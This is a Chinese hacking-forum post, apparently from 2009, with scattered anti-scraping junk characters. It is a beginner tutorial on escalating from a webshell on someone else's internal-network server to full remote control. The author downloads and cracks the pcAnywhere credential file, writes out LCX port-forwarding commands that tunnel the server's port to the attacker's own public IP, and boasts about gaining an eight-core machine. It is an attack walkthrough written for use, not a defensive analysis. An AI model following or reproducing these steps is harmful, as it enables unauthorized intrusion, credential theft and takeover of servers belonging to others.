|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。: c0 A1 l# \7 H, M
( s$ M& ]! G. c
提权方法:pcanywhere+LCX
+ W$ e9 l+ R; P2 e. q4 ^1 t7 t1 |
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。6 v0 z: {9 T' d* a' E
) i; X4 t! X) D/ ^在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
" Q* E8 `2 ~ B6 M
* N; Z& w: y1 n& i
5 E/ s8 h) a. I查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。9 f0 k4 e3 s9 r H9 p
Q7 ?. N: `* p, f5 P V, }+ L
4 @$ c: r( X' `* U
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
3 H: j' { x( r8 F( V. o$ {6 j' A3 m! [ ]9 Q0 g0 r# i3 T
1 |! r5 b) P* B3 C
2 V% x; d8 H$ E+ e9 J, a& U
/ f# p& d9 | L由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
* b7 H5 q) w- G" ]
. p: e7 p. r$ g
- Y+ G; D1 X2 mLCX的用法再简单说下:
6 W5 p! i6 q, _6 X1 {. `& a: e
( u- v, A9 P( r! X' Y5 n7 l服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
6 x2 U7 d0 a. B/ f% |) O* \" H( Y' x" N" p, ^
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口), ?! `* p( H4 i
' n% h8 L2 L! P* q
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
: L/ Z; T0 a, D; y顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``6 q3 Z* G! K# I+ @0 ` Y# w
7 V. W0 \ A1 c9 w: H9 n1 s1 H
$ Y ]2 C, f/ R( n' T, `/ p
3 d, C+ J( J3 z4 o4 k6 r7 `3 P( z, a6 s
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。& \; ?$ @4 s' _; J* J
" [8 i/ k2 n1 d$ Y [+ T0 ^$ c
9 P! [& u) i& ]3 m J/ W
6 s6 V7 _" W D
# j6 l- D8 ?9 |# r我们本地连接试试,输入我们刚破解的账号密码
. r" k) r6 m& f0 M
# t2 q/ ^+ C* ]$ [4 [1 J% ~- L
$ q4 Y6 j3 W! l5 ]$ j8 M呵呵``连接成功,服务器不错,又一个8核^︵^
: d6 p4 s; }1 {6 Y4 h
5 D0 S. ^2 z- B8 D$ i" N3 o+ A" t* {9 e
( o5 a' b Z" L. L j z |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-12-15 15:36
| 
.gif)
